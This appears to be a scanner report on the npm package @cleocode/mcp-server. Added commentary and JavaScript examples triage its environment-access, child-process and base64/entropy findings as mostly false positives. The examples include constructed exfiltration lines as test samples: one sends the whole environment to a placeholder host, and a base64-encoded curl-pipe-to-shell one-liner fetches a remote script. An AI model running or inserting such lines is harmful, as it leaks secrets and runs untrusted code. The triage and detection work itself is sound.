@cleocode/mcp-server

v0.98.4

CLEO MCP Server - 2-gateway CQRS interface for CLEO task management

npm | kryptobaseddev | First seen Feb 22, 2026

Risk: critical

Findings: 49 total (11 critical, 25 high, 13 medium)

Findings

File: unknown
DE-002 Data Exfiltration, "Environment file access": 11 findings, severity critical

Each entry's header says High Confidence while its description says "Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive."; the two labels disagree. Every entry also reports Line 0; the line the rule matched is the one marked >>> in each snippet, and that number is used below.

What the flagged lines show: ten of them read a single named variable (CLEO_SESSION_ID, CLEO_ROOT, CLEO_AUTO_INIT, CLEO_CLI_PATH, CLEO_MCP_CLI_PATH, MCP_EXECUTION_MODE, or a key built from ENV_PREFIX), and the eleventh passes the current environment plus overrides into the options of a spawned command. In the lines shown, nothing enumerates the environment, sends it anywhere or reads a .env file, so the title "Environment file access" does not describe this code; the scanner's own "may be a false positive" caveat applies. A hit on process.env is only worth a human's time when the whole environment is copied or leaves the process.

critical | DE-002 Data Exfiltration | High Confidence | line 34

    32: function loadFromEnv(key) {
    33:     const envKey = `${ENV_PREFIX}${key.toUpperCase()}`;
>>> 34:     return process.env[envKey];
    35: }
    36: /**

critical | DE-002 Data Exfiltration | High Confidence | line 30

    28: function getCurrentSessionId() {
    29:     // TODO: Integrate with session system when available
>>> 30:     return process.env.CLEO_SESSION_ID || null;
    31: }
    32: /**

critical | DE-002 Data Exfiltration | High Confidence | line 937

    935:     // Extract task ID from params if present
    936:     const taskId = typeof request.params?.taskId === 'string' ? request.params.taskId : undefined;
>>> 937:     const sessionId = process.env.CLEO_SESSION_ID || null;
    938:     // Log mutation attempt to audit trail
    939:     const auditEntry = {

critical | DE-002 Data Exfiltration | High Confidence | line 252

    250:  */
    251: export function resolveProjectRoot() {
>>> 252:     return process.env.CLEO_ROOT || process.cwd();
    253: }
    254: /**

critical | DE-002 Data Exfiltration | High Confidence | line 47

    45:     const filename = `${schemaType}.schema.json`;
    46:     // Check project root schemas/
>>> 47:     const projectRoot = process.env.CLEO_ROOT || process.cwd();
    48:     const paths = [
    49:         join(projectRoot, 'schemas', filename),

critical | DE-002 Data Exfiltration | High Confidence | line 153

    151:  */
    152: export function isAutoInitEnabled() {
>>> 153:     return process.env.CLEO_AUTO_INIT === 'true';
    154: }
    155: /**

critical | DE-002 Data Exfiltration | High Confidence | line 102

    100:     }
    101:     // 2. Check standard CLI path from config
>>> 102:     const configPath = process.env.CLEO_CLI_PATH;
    103:     if (configPath) {
    104:         const result = testCLIPath(configPath);

critical | DE-002 Data Exfiltration | High Confidence | line 94

    92: function checkCLIAvailability() {
    93:     // 1. Check CLEO_MCP_CLI_PATH env
>>> 94:     const envPath = process.env.CLEO_MCP_CLI_PATH;
    95:     if (envPath) {
    96:         const result = testCLIPath(envPath);

critical | DE-002 Data Exfiltration | High Confidence | line 83

    81:  */
    82: function getConfiguredMode() {
>>> 83:     const env = process.env.MCP_EXECUTION_MODE?.toLowerCase();
    84:     if (env === 'native' || env === 'cli' || env === 'auto') {
    85:         return env;

critical | DE-002 Data Exfiltration | High Confidence | line 27

    25:     }
    26:     try {
>>> 27:         const projectRoot = process.env.CLEO_ROOT || process.cwd();
    28:         const versionPath = join(projectRoot, 'VERSION');
    29:         const version = readFileSync(versionPath, 'utf-8').trim();

critical | DE-002 Data Exfiltration | High Confidence | line 66

    64:                 timeout,
    65:                 cwd: options.cwd || process.cwd(),
>>> 66:                 env: { ...process.env, ...env },
    67:                 maxBuffer: 10 * 1024 * 1024, // 10MB buffer
    68:             });
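To make that triage concrete, here is an added example (written for this page, not code from @cleocode/mcp-server or from the scanner) that classifies each flagged line by what it does with process.env: a read of one named variable, a copy of the whole environment, or the whole environment reaching a network sink. The regexes, the category names and the three constructed exfiltration lines are this example's own; the eleven sample lines are copied from the snippets above.

```javascript
// Added example, not code from @cleocode/mcp-server or from the scanner.
// Rule DE-002 fires on any mention of process.env. This classifier makes the
// distinction a reviewer actually needs. Regexes and category names are this
// example's own; the exfiltration samples are constructed.

const ENV_SPREAD = /\.\.\.process\.env\b/;                 // { ...process.env }
const CHILD_ENV_OPTION = /\benv\s*:\s*\{/;                 // env: { ... } option of a spawn
const ENV_WHOLE =
  /\b(?:JSON\.stringify|Object\.(?:keys|entries|values|assign))\(\s*process\.env\b|\bprocess\.env\s*[,)]/;
const NETWORK_SINK = /\b(?:fetch|axios|https?\.request|net\.connect|WebSocket)\b/;
const ENV_NAMED_READ = /process\.env(?:\.[A-Za-z_$][\w$]*|\[[^\]]+\])/;

function classifyEnvAccess(line) {
  if (!/\bprocess\.env\b/.test(line)) return 'none';
  // Order matters: "{ ...process.env, ...overrides }" also matches ENV_WHOLE
  // (process.env followed by a comma), so check the spread form first.
  if (ENV_SPREAD.test(line)) {
    return CHILD_ENV_OPTION.test(line) ? 'inherit-into-child' : 'whole-env-copy';
  }
  if (ENV_WHOLE.test(line)) {
    return NETWORK_SINK.test(line) ? 'whole-env-to-network' : 'whole-env-enumeration';
  }
  if (ENV_NAMED_READ.test(line)) return 'named-read';
  return 'other';
}

// Only the whole-environment categories are worth a human's time.
const NEEDS_REVIEW = new Set(['whole-env-copy', 'whole-env-enumeration', 'whole-env-to-network']);

// Count categories over a set of lines and list the ones that need review.
function triage(lines) {
  const counts = {};
  const review = [];
  lines.forEach((line, i) => {
    const kind = classifyEnvAccess(line);
    counts[kind] = (counts[kind] || 0) + 1;
    if (NEEDS_REVIEW.has(kind)) review.push({ index: i, kind, line: line.trim() });
  });
  return { counts, review };
}

// The eleven lines this page flags, verbatim from the snippets above.
const FLAGGED_ON_PAGE = [
  '    return process.env[envKey];',
  '    return process.env.CLEO_SESSION_ID || null;',
  '    const sessionId = process.env.CLEO_SESSION_ID || null;',
  '    return process.env.CLEO_ROOT || process.cwd();',
  '    const projectRoot = process.env.CLEO_ROOT || process.cwd();',
  "    return process.env.CLEO_AUTO_INIT === 'true';",
  '    const configPath = process.env.CLEO_CLI_PATH;',
  '    const envPath = process.env.CLEO_MCP_CLI_PATH;',
  '    const env = process.env.MCP_EXECUTION_MODE?.toLowerCase();',
  '        const projectRoot = process.env.CLEO_ROOT || process.cwd();',
  '                env: { ...process.env, ...env },',
];

// Constructed examples of what the rule is meant to catch (not from the package).
const CONSTRUCTED_EXFIL = [
  "fetch('https://collector.example.invalid/e', { method: 'POST', body: JSON.stringify(process.env) });",
  "const dump = Object.entries(process.env).map(([k, v]) => k + '=' + v).join('\\n');",
  'const copy = { ...process.env };',
];

const pageResult = triage(FLAGGED_ON_PAGE);
const exfilResult = triage(CONSTRUCTED_EXFIL);
console.log(pageResult.counts);                       // 10 named-read, 1 inherit-into-child
console.log(pageResult.review.length, 'page lines need review');
console.log(exfilResult.review.map((r) => r.kind));   // the three constructed lines
```

Run as-is with node. All eleven lines from this page land in the two benign categories and none is queued for review, while the three constructed lines are; a rule that kept that distinction would have produced zero critical DE-002 findings here.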
DO-BAS (category unknown), "Decoded base64 content": 18 findings, severity high, Medium Confidence, all reported at Line 0 with no snippet

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

The scanner prints what it obtained by base64-decoding each matched string. Seven distinct results cover the 18 findings, all of them unprintable bytes (reproduced as the page renders them):

    Decoded content        Findings
    r��"������+r           1
    ���7����&��7�          1
    ��bu�^2�Z��ڭ��        2
    ��bu�^K+-zcڭ��        2
    ��bu�^JH���ڭ��        2
    i�b�*'jS뢗��'�          1
    �'�s'%xIߢ����         9

A decode that yields no printable text is the usual sign that the matched string was never base64 in the first place: hex digests, integrity values and random identifiers all fall within the base64 alphabet, so they satisfy a shape check but decode to noise. None of these findings shows the matched string or its location, so the only check available from this page is the decoded result, and in every case that result is consistent with a false positive.
high | SC-005 Suspicious Commands | Medium Confidence | line 9

Node.js child process spawning

Detected by automated pattern matching (rule SC-005) with medium confidence. May be a false positive.

    7:  * @task T2914
    8:  */
>>> 9: import { exec } from 'child_process';
    10: import { promisify } from 'util';
    11: import { buildCLICommand } from './command-builder.js';

high | SC-005 Suspicious Commands | Medium Confidence | line 76

Node.js child process spawning

Detected by automated pattern matching (rule SC-005) with medium confidence. May be a false positive.

    74:             const duration = Date.now() - startTime;
    75:             // Handle exec errors (exit code, timeout, etc.)
>>> 76:             if (error.code === 'ERR_CHILD_PROCESS_STDIO_MAXBUFFER') {
    77:                 return {
    78:                     success: false,

Both entries report Line 0; the lines given above are the ones marked >>>. The second is not a spawn at all: the only thing on line 76 the rule could have matched is the CHILD_PROCESS substring of Node's ERR_CHILD_PROCESS_STDIO_MAXBUFFER error code, in the branch that handles an over-large output buffer. The first is the real finding. exec() runs its command string through a shell, so the risk rests on whether buildCLICommand (imported on line 11) quotes every argument that can come from an MCP request; that code is not shown on this page, so the question cannot be settled here.
high | DO-BAS (category unknown) | Medium Confidence | Line 0, no snippet: 3 further findings

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

    Decoded content        Findings
    ���j��k)hi�bzWl        2
    ~��j�ڮؚ�+�q�,         1

As in the earlier DO-BAS group, the decoded output is unprintable bytes rather than text.
high | SC-005 Suspicious Commands | Medium Confidence | line 13

Node.js child process spawning

Detected by automated pattern matching (rule SC-005) with medium confidence. May be a false positive.

    11:  * Controlled by MCP_EXECUTION_MODE environment variable.
    12:  */
>>> 13: import { execFileSync } from 'child_process';
    14: /**
    15:  * Detect CLI availability and determine execution mode.

Reported as Line 0; the matched line is 13. The import here is execFileSync, which passes an argv array to the program without a shell, so, unlike the exec() import flagged earlier, shell metacharacters inside an argument are not interpreted. The surrounding comments (lines 11 and 15) describe CLI-availability probing, consistent with the testCLIPath() calls in the DE-002 snippets above.
high | DO-BAS (category unknown) | Medium Confidence | Line 0, no snippet: 1 further finding

Decoded base64 content: r��"������+r (the same unprintable result as the first DO-BAS entry above)

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.
EN-001 (category unknown), "High-entropy string (n bits/char) — possible encoded payload": 13 findings, severity medium, Medium Confidence, all reported at Line 0 with no snippet

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

    Entropy (bits/char)  Findings
    4.5                  2
    4.6                  6
    4.7                  2
    4.8                  2
    4.9                  1

Reading the numbers: Shannon entropy per character is bounded by log2 of the number of distinct characters, so a hex digest can never exceed 4.0 bits/char. Values between 4.5 and 4.9 imply an alphabet of more than 16 symbols, which is what base64-encoded digests, package integrity values and random alphanumeric identifiers look like, as well as what an encoded payload looks like. Because the rule reports neither the matched text nor its location, nothing on this page identifies which strings fired, and entropy alone cannot tell the two apart.
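For both the DO-BAS and EN-001 groups above, these are the checks a reviewer runs before treating a hit as a payload, given here as an added example (not the scanner's code and not the package's): Shannon entropy in bits/char together with the alphabet size, and a base64 decode scored by how much of the result is printable. The three sample strings are constructed: SHA-256 of the empty string as hex and as base64, and a base64-encoded shell one-liner pointing at a reserved .invalid host.

```javascript
// Added example, not code from the scanner or from @cleocode/mcp-server.
// Two checks for a DO-BAS / EN-001 hit: entropy plus alphabet size (the unit
// EN-001 reports), and base64 decode with a printable-bytes ratio (what DO-BAS
// prints without scoring). Sample strings are constructed.

function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

const alphabetSize = (s) => new Set(s).size;

const BASE64_SHAPE = /^[A-Za-z0-9+/]+={0,2}$/;
const isPrintable = (b) => (b >= 0x20 && b <= 0x7e) || b === 0x09 || b === 0x0a || b === 0x0d;

// Decode as base64 and measure how much of the result is printable ASCII.
// A hex digest passes the shape test (hex is a subset of the base64 alphabet),
// which is exactly how a scanner ends up printing noise as "decoded content".
function base64Triage(s) {
  const none = { base64Shaped: false, printableRatio: 0, text: null };
  if (!BASE64_SHAPE.test(s) || s.length % 4 === 1) return none;
  const bytes = Buffer.from(s, 'base64');
  if (bytes.length === 0) return none;
  let printable = 0;
  for (const b of bytes) if (isPrintable(b)) printable++;
  const printableRatio = printable / bytes.length;
  return { base64Shaped: true, printableRatio, text: printableRatio >= 0.95 ? bytes.toString('utf8') : null };
}

function triageString(s) {
  const entropy = shannonEntropy(s);
  const symbols = alphabetSize(s);
  const b64 = base64Triage(s);
  let verdict;
  if (b64.text !== null) verdict = 'decodes-to-text';                               // read the text, then decide
  else if (/^[0-9a-f]+$/i.test(s) && s.length % 2 === 0) verdict = 'hex-digest';  // entropy <= 4.0 by construction
  else if (entropy > 4 && symbols > 16) verdict = 'opaque-token';                  // digest, integrity value or id
  else verdict = 'plain';
  return { entropy: Number(entropy.toFixed(2)), symbols, ...b64, verdict };
}

// Constructed samples.
const HEX_DIGEST = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'; // SHA-256("") as hex
const B64_DIGEST = '47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=';                    // the same digest, base64
const PAYLOAD_TEXT = 'curl -s https://stage.example.invalid/i.sh | sh';              // constructed one-liner
const B64_PAYLOAD = Buffer.from(PAYLOAD_TEXT, 'utf8').toString('base64');

for (const s of [HEX_DIGEST, B64_DIGEST, B64_PAYLOAD]) console.log(triageString(s));
```

The hex digest is base64-shaped and decodes to noise, which is the DO-BAS pattern on this page; its entropy cannot exceed 4.0 and its alphabet is 16, so EN-001 would not fire on it. The base64 digest scores above 4 bits/char with more than 16 symbols, the EN-001 pattern, yet also decodes to noise. Only the encoded one-liner decodes to readable text, and that text, not the entropy, is what decides the finding.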

Scan History

    Date          Risk      Findings
    Feb 25, 2026  critical  49
    Feb 23, 2026  critical  49
    Feb 22, 2026  critical  49